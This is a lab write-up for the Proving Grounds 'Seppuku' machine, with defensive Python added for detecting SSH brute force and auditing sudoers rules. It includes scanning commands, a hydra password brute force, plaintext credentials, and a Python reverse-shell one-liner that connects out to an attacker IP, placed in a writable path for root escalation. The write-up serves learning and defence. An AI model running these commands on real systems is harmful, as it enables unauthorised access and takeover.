Proving Grounds: Seppuku
Information Gathering:
First, I scanned for open ports with nmap and saved the output to a text file.
nmap -T4 -Pn -p- 192.168.228.90 -oN Port.txt
Then I scanned for the services running on each open port.
nmap -T4 -Pn -sVC -p21,22,80,139,445,7080,7601,8088 192.168.228.90 -oN services.txt
I tried accessing port 80, but it asked for a username and password that I didn't have. I looked at the page source and found nothing there either.
I scanned with dirsearch and found only /info.php.
dirsearch -u http://192.168.228.90/
So I checked SMB on port 445 and found that it was not accessible to the anonymous user.
smbmap -H 192.168.228.90
I also tried smbclient; no shares were listed for the anonymous user.
smbclient -L \\192.168.228.90 -N
Next, I moved to port 7080. It served a page with the message 404 Not Found.
I tried scanning for paths and found nothing.
So I moved to port 7601 and opened the web page. It showed only a picture.
I scanned for paths again, and this time I found many. Let's check them.
dirsearch -u http://192.168.228.90:7601/
I checked every path and found nothing useful, but /secret looked interesting, so I went there.
There were many files here, so let's go through them.
The details:
1. hostname: it contained seppuku, possibly a username.
2. jack.jpg: I tried binwalk and exiftool; nothing special.
3. passwd.bak: some kind of rabbit-hole file.
4. password.lst: a password list, so it can be used for brute-forcing.
5. shadow.bak: another rabbit-hole file.
Let's check the other port, 8088.
It looked the same as the last one.
I used dirsearch again to look for interesting paths.
After that, I checked all the directories it found; none were interesting.
Exploitation:
I decided to make use of the information I had gathered: the username "seppuku" from the hostname file and the password list from password.lst, to brute-force the SSH login on port 22.
I used hydra, and it found the password: eeyoree.
hydra -l seppuku -P password.lst ssh://192.168.228.90
Next, I connected over SSH on port 22.
username: seppuku, password: eeyoree
I spawned an interactive shell so that I could run commands without problems. (I noticed that Python was installed on this system.)
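From the defender's side, the brute force above leaves a very recognisable trace in the SSH server's auth.log. The Python below is an added example (not part of the original walkthrough) that flags a user/source pair with many failed password attempts in a short window and notes whether an accepted login followed; the log lines are constructed, and the hostname, source IPs and thresholds are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed OpenSSH auth.log excerpt (assumed, not captured from the lab box):
# a burst of failed logins for one user from one source, then a success.
SAMPLE_AUTH_LOG = """\
Jan 10 09:00:01 seppuku sshd[1201]: Failed password for seppuku from 192.168.45.187 port 50102 ssh2
Jan 10 09:00:01 seppuku sshd[1203]: Failed password for seppuku from 192.168.45.187 port 50103 ssh2
Jan 10 09:00:02 seppuku sshd[1205]: Failed password for seppuku from 192.168.45.187 port 50104 ssh2
Jan 10 09:00:02 seppuku sshd[1207]: Failed password for seppuku from 192.168.45.187 port 50105 ssh2
Jan 10 09:00:03 seppuku sshd[1209]: Failed password for seppuku from 192.168.45.187 port 50106 ssh2
Jan 10 09:00:03 seppuku sshd[1211]: Failed password for seppuku from 192.168.45.187 port 50107 ssh2
Jan 10 09:00:04 seppuku sshd[1213]: Accepted password for seppuku from 192.168.45.187 port 50108 ssh2
Jan 10 09:05:00 seppuku sshd[1300]: Failed password for invalid user admin from 10.0.0.5 port 40000 ssh2
"""

LOG_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ [\d:]{8}) \S+ sshd\[\d+\]: (?P<result>Failed|Accepted) password "
    r"for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)


def detect_bruteforce(log_text, threshold=5, window_seconds=60):
    """Return {(user, ip): {...}} for pairs with >= threshold failed logins
    inside window_seconds, noting whether the same pair later logged in."""
    events = defaultdict(list)  # (user, ip) -> [(timestamp, result), ...]
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            # syslog timestamps carry no year; strptime defaults to 1900, fine for deltas
            ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")
            events[(m["user"], m["ip"])].append((ts, m["result"]))
    findings = {}
    for key, evs in events.items():
        evs.sort()
        fails = [t for t, r in evs if r == "Failed"]
        for i, start in enumerate(fails):
            burst = [t for t in fails[i:] if (t - start).total_seconds() <= window_seconds]
            if len(burst) >= threshold:
                success = any(r == "Accepted" and t >= start for t, r in evs)
                findings[key] = {"failures": len(burst), "success_after_burst": success}
                break
    return findings


if __name__ == "__main__":
    for (user, ip), info in detect_bruteforce(SAMPLE_AUTH_LOG).items():
        print(f"ALERT {user}@{ip}: {info}")
```

A burst that ends in an accepted login is the case worth paging on: it is exactly what the hydra run above produces on the server.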
python3 -c 'import pty;pty.spawn("/bin/bash")'
Let’s get the first flag.
I saw a file called .passwd; I read it, and it was someone's password.
I checked /etc/passwd for other users on the system and found samurai and tanto, so I could try the password from .passwd with them.
cat /etc/passwd
I explored the other directories and found nothing special.
Next, I looked at /var/www/html, in case my scanning tool had missed something because I had used the default wordlist, which does not contain many words. There were indeed additional files I had missed.
I checked the keys/ directory and found a file called private.
It looked like I could use this to log in as either samurai or tanto.
Before switching users, I ran sudo -l to list the commands the current user is allowed to run, to check whether I could escalate to root as seppuku.
The entry NOPASSWD: /usr/bin/ln -sf /root /tmp/ in the sudoers file means that the user is allowed to run the ln -sf /root /tmp/ command as root without being prompted for a password.
sudo -l
After spending some time on it, I could not find a way to abuse the ln rule, so I had to look for other ways to escalate privileges.
Changing the user account: I tried su with samurai and tanto, and samurai worked with the password from .passwd.
username: samurai, password: 12345685213456!@!@A
Privilege Escalation:
Afterward, I ran sudo -l again to check which programs the samurai user could run, and found that /../../../../../../home/tanto/.cgi_bin/bin /tmp/* was allowed for samurai.
I tried running the program, but there was no such file in tanto's directory. When I checked tanto's home directory, I could not find a .cgi_bin directory at all.
I would have to create it manually, but as samurai I did not have permission to write in tanto's home, so I had to switch to the tanto user.
Where is the password for tanto? I didn't have it, but I could use the SSH key from /var/www/html/keys/private.
Since I was already logged in to the target system, I specified the IP as 127.0.0.1. It was successful.
ssh -i private tanto@127.0.0.1
Let's create the folder and add a reverse shell command, or any command that can perform privilege escalation.
I went to revshells.com and generated the payload.
I used the Python payload, since I had noticed earlier that I could spawn an interactive shell with python.
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.187",8000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")'
Listen on the chosen port and wait for the connection.
nc -nlvp 8000
Let’s get this job done.
I went back to tanto, created the .cgi_bin directory with a bin file inside, and put the payload in that file.
Don't forget to add #!/bin/bash as the first line so the file runs without problems.
The important part is to change the file's permissions.
chmod 777 bin
Now the setup was ready. I went back to the samurai account and executed the file.
And it was done!
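Both sudo rules in this walkthrough come from the same sudoers file, and the samurai rule is the real weakness: its command path climbs with `..` into a directory that a non-root user controls, and it takes a wildcard argument. As an added example (not code from the walkthrough), the Python below audits sudoers-style lines for exactly those patterns; the sudoers excerpt is constructed from the two rules sudo -l showed, and the list of trusted bin directories and the live ownership/permission check are assumptions.

```python
import os
import posixpath
import re

# Constructed sudoers excerpt reproducing the two rules sudo -l showed in the walkthrough.
SAMPLE_SUDOERS = """\
# User privilege specification
root    ALL=(ALL:ALL) ALL
seppuku ALL=(ALL) NOPASSWD: /usr/bin/ln -sf /root /tmp/
samurai ALL=(ALL) NOPASSWD: /../../../../../../home/tanto/.cgi_bin/bin /tmp/*
"""

RULE_RE = re.compile(r"^(?P<user>\S+)\s+\S+=\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")
SYSTEM_BIN_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/")  # assumed trusted locations


def audit_sudoers(text):
    """Return {user: [issue, ...]} for non-root rules that hand out root in a risky way."""
    findings = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments and blank lines
        m = RULE_RE.match(line) if line else None
        if not m or m["user"] == "root":
            continue
        issues = []
        if "NOPASSWD" in m["tags"]:
            issues.append("NOPASSWD: runs as root without re-authentication")
        for cmd in m["cmds"].split(","):
            parts = cmd.split()
            path, args = parts[0], parts[1:]
            if path == "ALL":
                issues.append("ALL: unrestricted root")
                continue
            resolved = posixpath.normpath(path)      # collapses the leading /../.. chain
            if ".." in path.split("/"):
                issues.append(f"'..' in command path; it really resolves to {resolved}")
            if not resolved.startswith(SYSTEM_BIN_DIRS):
                issues.append(f"{resolved} is outside the system bin dirs (user-writable?)")
            if any("*" in a for a in args):
                issues.append("wildcard argument lets the caller choose extra arguments")
            if os.path.exists(resolved):             # live check, only meaningful on the host itself
                st = os.stat(resolved)
                if st.st_uid != 0 or st.st_mode & 0o022:
                    issues.append(f"{resolved} is not root-owned or is group/world writable")
        if issues:
            findings[m["user"]] = issues
    return findings
```

Run `audit_sudoers(open("/etc/sudoers").read())` as root on the box and the samurai rule is reported three times over (traversal, non-system path, wildcard), which is the fix list: a fixed absolute path under a root-owned directory, no wildcard, and no NOPASSWD.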